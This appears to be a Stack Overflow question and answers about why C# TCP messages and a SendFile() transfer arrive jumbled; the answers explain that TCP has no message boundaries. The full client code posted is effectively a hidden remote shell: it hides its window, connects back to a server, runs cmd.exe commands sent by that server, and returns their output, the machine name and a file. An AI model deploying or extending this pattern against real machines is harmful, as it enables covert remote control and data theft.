# C# Client.SendFile() separating stream

Tags: c#, tcp, tcpclient, networkstream

Please bear in mind I am new to C# language and networking so forgive me if this might sound obvious.

I'm just in the process of understanding TCP clients and how to separate streams...

In this example, I have 3 sets of data that I want to send...

1. is a CMD output:

   ```
        private void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
        {
            StringBuilder strOutput = new StringBuilder();
            if (!String.IsNullOrEmpty(outLine.Data))
            {
                try
                {

                    strOutput.Append(outLine.Data);
                    buffer = encoder.GetBytes("2 " + outLine.Data+ "\r\n");
                    networkStream = newclient.GetStream();
                    networkStream.Write(buffer, 0, buffer.Length);
                    networkStream.Flush();
                }
                catch (Exception err) { }
            }
        }
   ```

Which returns as a first stream the following:

[image]

With a prebuffer as number 2(To separate the data)

2. The second Is a simple get info:

   ```
    private void GetClientinfo()
        {
            networkStream = newclient.GetStream();
            buffer = encoder.GetBytes("1 " + Environment.MachineName +"\n"+"Connected");
            networkStream.Write(buffer, 0, buffer.Length);
            networkStream.Flush();
        }
   ```

Which then sends the following :

[image]

So then my stream ends up being separated:

[image]

My issue is then that I try to send a file with the following script:

```
private void sendFile()
        {

            // Create the preBuffer data.
            string string1 = String.Format("9 ");
            byte[] preBuf = Encoding.ASCII.GetBytes(string1);

            // Create the postBuffer data.
            string string2 = String.Format("");
            byte[] postBuf = Encoding.ASCII.GetBytes(string2);
            string filePath = @"\Users\nico_\Documents\transfer_ex.txt";
            
            newclient.Client.SendFile(filePath, preBuf, postBuf, TransmitFileOptions.UseDefaultWorkerThread);
            


        }
```

As you can see, it ends up getting jumbled up with the second stream being sent...
What would be the cause of this?

[image]

FULL SERVER SCRIPT:

```
public partial class Form1 : Form
    {
        TcpListener tcpListener = new TcpListener(System.Net.IPAddress.Any, 6666);
        private int appStatus = 0;
        TcpClient client;
        TcpClient streamData;
        List<TcpClient> clientList = new List<TcpClient>();
        NetworkStream networkStream;
        Thread th_StartListen, th_handleClient;
        StringBuilder strOutput;



        public Form1()
        {
            InitializeComponent();
        }

        private void Form1_Load(object sender, EventArgs e)
        {
            th_StartListen = new Thread(new ThreadStart(StartListen));
            th_StartListen.Start();
            txtCmdOutput.Focus();
        }

        private void StartListen()
        {
            //Creating a TCP Connection and listening to the port
            tcpListener = new TcpListener(System.Net.IPAddress.Any, 6666);
            tcpListener.Start();
            toolStripStatusLabel1.Text = "Listening on port 6666 ...";
            int counter = 0;
            appStatus = 0;

            while (appStatus != 2)
            {
                try
                {
                    client = tcpListener.AcceptTcpClient();
                    counter++;
                    clientList.Add(client);
                    IPEndPoint ipend = (IPEndPoint)client.Client.RemoteEndPoint;
                    //Updating status of connection
                    toolStripStatusLabel1.Text = "Connected from "+ IPAddress.Parse(ipend.Address.ToString());
                    appStatus = 1;
                    th_handleClient = new Thread(delegate () { handleClient(client, counter); });
                    th_handleClient.Start();
                }
                catch (Exception err)
                {
                    {
                        Cleanup();
                    }
                }
            }
        }

        private void handleClient(object client, int i)
        {
            try
            {
                TcpClient streamData = (TcpClient)client;
                byte[] data = new byte[4096];
                byte[] sendData = new byte[4096];
                int byteRead;
                string strdata;
                ASCIIEncoding encode = new ASCIIEncoding();
                Thread.Sleep(2000);
                NetworkStream networkstream = streamData.GetStream();
                //Send Command 1
                sendData = encode.GetBytes("1");
                networkstream.Write(sendData, 0, sendData.Length);
                networkstream.Flush();
                //Listen...
                while (true)
                {
                    byteRead = 1;
                    byteRead = networkstream.Read(data, 0, 4096);
                    //receiveFile();


                    if (networkstream.DataAvailable != true)
                    {
                        
                        strdata = Encoding.ASCII.GetString(data, 0, byteRead);
                        Debug.WriteLine(strdata);
                        

                        //Get user info
                        if (strdata.StartsWith("1"))
                        {
                            updateLabel(labelMachinename, strdata, 0);
                            updateLabel(labelSampleOutput, strdata, 1);
                        }
                        if (strdata.StartsWith("2"))
                        {
                            updateText(txtCmdConsole, strdata);
                        }
                        if (strdata.StartsWith("9"))
                        {
                            Debug.WriteLine(strdata);
                        }
                        //receiveFile();
                    }
                }
            }
            catch (Exception err)
            {
                {
                    Cleanup();

                }
            }

        }



        private void receiveFile()
        {
            StreamReader reader = new StreamReader(client.GetStream());
            string fileSize = reader.ReadLine();
            string fileName = reader.ReadLine();
            int length = Convert.ToInt32(fileSize);
            byte[] buffer = new byte[length];
            int received = 0;
            int read = 0;
            int size = 1024;
            int remaining = 0;

            while (received < length)
            {
                remaining = length - received;
                if (remaining < size)
                {
                    size = remaining;
                }

                read = client.GetStream().Read(buffer, received, size);
                received += read;
            }
            // Save the file using the filename sent by the client    
            using (FileStream fStream = new FileStream(Path.GetFileName(fileName), FileMode.Create))
            {
                fStream.Write(buffer, 0, buffer.Length);
                fStream.Flush();
                fStream.Close();
            }

            Debug.WriteLine("File received and saved in " + Environment.CurrentDirectory);
        }

        private void txtCmdOutput_KeyDown(object sender, KeyEventArgs e)
        {
            try
            {
                if (e.KeyCode == Keys.Enter && appStatus == 1)
                {
                    TcpClient streamData = (TcpClient)client;
                    byte[] sendData = new byte[4096];
                    ASCIIEncoding encode = new ASCIIEncoding();
                    NetworkStream networkstream = streamData.GetStream();
                    sendData = encode.GetBytes("2 "+ txtCmdOutput.Text.ToString());
                    networkstream.Write(sendData, 0, sendData.Length);
                    networkstream.Flush();
                    txtCmdOutput.Text = "";
                }
            }
            catch (Exception err) {
                {
                    Cleanup();
                    
                }
            }
        }


        private void updateLabel(Label label,string strdata, int row)
        {
            label.Invoke((MethodInvoker)delegate
            {
                label.Text = strdata.Substring(2).Split(new char[] { '\r', '\n' })[row];
            });

        }

        private void updateText(TextBox text, string strdata)
        {
            text.Invoke((MethodInvoker)delegate
            {
                text.AppendText(strdata.Substring(2));
            });

        }

        private void btnKillClient_Click(object sender, EventArgs e)
        {
            try
            {
                TcpClient streamData = (TcpClient)client;
                byte[] sendData = new byte[4096];
                ASCIIEncoding encode = new ASCIIEncoding();
                NetworkStream networkstream = streamData.GetStream();
                sendData = encode.GetBytes("3");
                networkstream.Write(sendData, 0, sendData.Length);
                networkstream.Flush();
                Cleanup();
            }
            catch (Exception err)
            {
                {
                    Cleanup();

                }
            }
        }

        private void Form1_FormClosing(object sender, FormClosingEventArgs e)
        {
            System.Environment.Exit(System.Environment.ExitCode); 
        }

        private void Cleanup()
        {
            try
            {
                toolStripStatusLabel1.Text = "Connection Lost";
                
            }
            catch (Exception err) { }
        }
    }
```

FULL CLIENT SCRIPT:

```
public partial class Form1 : Form
    {
        private int appStatus = 0;
        TcpClient newclient = new TcpClient();
        NetworkStream networkStream;
        byte[] buffer = new byte[4096];
        ASCIIEncoding encoder = new ASCIIEncoding();
        Process processCmd;
        Thread th_ListenToServer, th_RunServer;

        public Form1()
        {
            InitializeComponent();
        }

        private void Form1_Shown(object sender, EventArgs e)
        {
            this.Hide();
            th_ListenToServer = new Thread(new ThreadStart(ListenToServer));
            th_ListenToServer.Start();
            //ConnectToServer();


        }

        private void ListenToServer()
        {

            while (!newclient.Connected)
            {
                try
                {
                    newclient = new TcpClient();
                    
                    Debug.WriteLine("trying to connect...");
                    newclient = new TcpClient("127.0.0.1", 6666);
                    networkStream = newclient.GetStream();
                    th_RunServer = new Thread(new ThreadStart(RunServer));
                    th_RunServer.Start();

                }
                catch (Exception ex)
                {
                    Debug.WriteLine("Could not connect to server");
                    System.Threading.Thread.Sleep(5000); //Wait 5 seconds then try again
                }
            }
        }


        private void RunServer()
        {

            byte[] data = new byte[4096];
            int i;
            string strdata;
            i = 0;
            CmdHandler();
            sendFile();  
            while (newclient.Connected)
            {
                try
                {
                    i = 0;
                    i = networkStream.Read(data, 0, data.Length);
                    if (i == 0) { break; }
                    strdata = Encoding.ASCII.GetString(data, 0, i);
                    Debug.WriteLine(strdata);

                    if (strdata == "1")
                    {
                        GetClientinfo();
                    }

                    if (strdata.StartsWith("2"))
                    {
                        //Debug.WriteLine(strdata);
                        processCmd.StandardInput.WriteLine(strdata.Substring(2));
                    }
                    if (strdata.StartsWith("3"))
                    {

                        StopServer();
                    }
                    if (strdata.StartsWith("4"))
                    {

                        StopServer();
                    }
                    else
                    {
                        //sendFile();

                    }
                }
                catch
                {
                    Cleanup();
                    new Thread(ListenToServer).Start();
                    Debug.WriteLine("Attempting Reconection");
                }
            }
        }


        private void sendFile()
        {
            /*
            // Create the preBuffer data.
            string fileName = @"\Users\nico_\Documents\transfer_ex.txt";
            byte[] fileNameByte = Encoding.ASCII.GetBytes(fileName);
            byte[] fileNameLen= BitConverter.GetBytes(fileNameByte.Length);
            byte[] fileData = File.ReadAllBytes(fileName);
            byte[] clientData = new byte[4 + fileNameByte.Length + fileData.Length];

            fileNameLen.CopyTo(clientData, 0);
            fileNameByte.CopyTo(clientData, 4);
            fileData.CopyTo(clientData, 4 + fileNameByte.Length);
            
            networkStream = newclient.GetStream();
            buffer = encoder.GetBytes("9 " + clientData);
            networkStream.Write(buffer, 0, buffer.Length);
            networkStream.Flush();
            */

            string string1 = String.Format("9 ");
            byte[] preBuf = Encoding.ASCII.GetBytes(string1);

            // Create the postBuffer data.
            string string2 = String.Format("");
            byte[] postBuf = Encoding.ASCII.GetBytes(string2);
            string filePath = @"\Users\nico_\Documents\transfer_ex.txt";
            
            newclient.Client.SendFile(filePath, preBuf, postBuf, TransmitFileOptions.UseDefaultWorkerThread);





        }


        private void GetClientinfo()
        {
            networkStream = newclient.GetStream();
            buffer = encoder.GetBytes("1 " + Environment.MachineName + "\n" + "Connected");
            networkStream.Write(buffer, 0, buffer.Length);
            networkStream.Flush();
        }

        private void CmdHandler()
        {
            processCmd = new Process();
            processCmd.StartInfo.FileName = "cmd.exe";
            processCmd.StartInfo.CreateNoWindow = true;
            processCmd.StartInfo.UseShellExecute = false;
            processCmd.StartInfo.RedirectStandardOutput = true;
            processCmd.StartInfo.RedirectStandardInput = true;
            processCmd.StartInfo.RedirectStandardError = true;
            //processCmd.OutputDataReceived += CaptureOutput;
            //processCmd.ErrorDataReceived += CaptureError;
            processCmd.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
            processCmd.ErrorDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
            processCmd.Start();
            processCmd.BeginOutputReadLine();
        }

        private void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
        {
            StringBuilder strOutput = new StringBuilder();
            if (!String.IsNullOrEmpty(outLine.Data))
            {
                try
                {

                    strOutput.Append(outLine.Data);
                    buffer = encoder.GetBytes("2 " + outLine.Data + "\r\n");
                    networkStream = newclient.GetStream();
                    networkStream.Write(buffer, 0, buffer.Length);
                    networkStream.Flush();
                }
                catch (Exception err) { }
            }
        }


        private void Cleanup()
        {
            try { processCmd.Kill(); } catch (Exception err) { };
            networkStream.Close();
        }
        private void StopServer()
        {
            Cleanup();
            System.Environment.Exit(System.Environment.ExitCode);
        }



    }
```

Comment: what class is Client an instance of?

Comment: Do you have a `Console.Write` statement somewhere that is executed in the last example but not the prior? Also, not sure about the usage of `String.Format`. Third, it's not clear to me what is referencing custom (but not shown) code and what represents third-party libraries. Maybe the `newClient` is to blame - some kind of underlying stream sharing? Just speculating.

Comment: Hey guys @VicF  I have pasted the entire script for better visibility. I only have one Debug.WriteLine(strdata); to show the data.... I hope my code is not too messy for yall to read

Comment: @pm100 just one class for now. I have attached both entire scripts.

Answer (score 0, accepted):

Here is the answer:

CLIENT SIDE:

```
private void sendFile()
        {
            string string1 = "9";
            byte[] preBuf = Encoding.ASCII.GetBytes(string1);

            // Create the postBuffer data.
            string string2 = "";
            byte[] postBuf = Encoding.ASCII.GetBytes(string2);
            string filePath = @"\Users\nico_\Documents\transfer_ex.txt";
            newclient.Client.SendFile(filePath, preBuf, postBuf, TransmitFileOptions.UseDefaultWorkerThread); 
        }
```

SERVER SIDE:

```
private void ReceiveFile(byte[] data, int byteRead)
        {
            var path = @"\Users\nico_\Documents\transferreeedd_ex.txt";

            
            FileStream fs = File.OpenWrite(path);
            //Debug.WriteLine(byteRead);
            //Debug.WriteLine(data);
            string ddstrdata = Encoding.ASCII.GetString(data, 0, byteRead);

            for (int i = 1; i < byteRead; i++)
            {
                Debug.WriteLine(i);
                fs.WriteByte(data[i]);
                
            }
            fs.Close();
        }
```

If you dont use any separtators, on `newclient.Client.SendFile` you can just put the Filepath and on Server side `int i = 0` & not `int i = 1`

Answer (score 0):

Your first output appends `\r\n`, which results in separation from the second output.  The second output embeds a `\n` (not `\r\n`) and ends with nothing, which means nothing separates it from the third output.

Either add a newline after data in `GetClientInfo`, or add one to `preBuf` in `sendFile()`.

Or switch to something less ambiguous, like length-prefixing.

Comment: Thanks for your answer. I tried doing that but this doesn't solve the issue because adding a  \r\n just adds a new line to the existing string data. The issue is that sendFile() gets sent together with the GetClientinfo() and they get jumbled up together. I wanted them to send separately. The server is listening for if (strdata.StartsWith("9")) but even if you put  \r\n the string still started with 1.

Comment: @King: There are no message separators in TCP.  You will have to separate the different parts yourself.  Either send the length ahead of each part so you know how many bytes to read, or use a separator/marker that you can later split on.

Comment: Hello @Ben Thanks for your answer.... What I was doing is sending a number at the beginning of every data I was sending, hoping that after flushing the steeam from client they would be sent individually. Does this mean that No matter the data I receive they can be mixed together? and i would need to use a separator such as size length and an ID?

Comment: The TCP abstraction is a continuous stream of bytes.  It does not provide any boundaries.  You need to transmit whatever data you need for keeping track of boundaries.

Comment: Thanks allot, would you know any documentation to help with filtering or setting these boundaries? maybe you could put this as answer and il give it a vote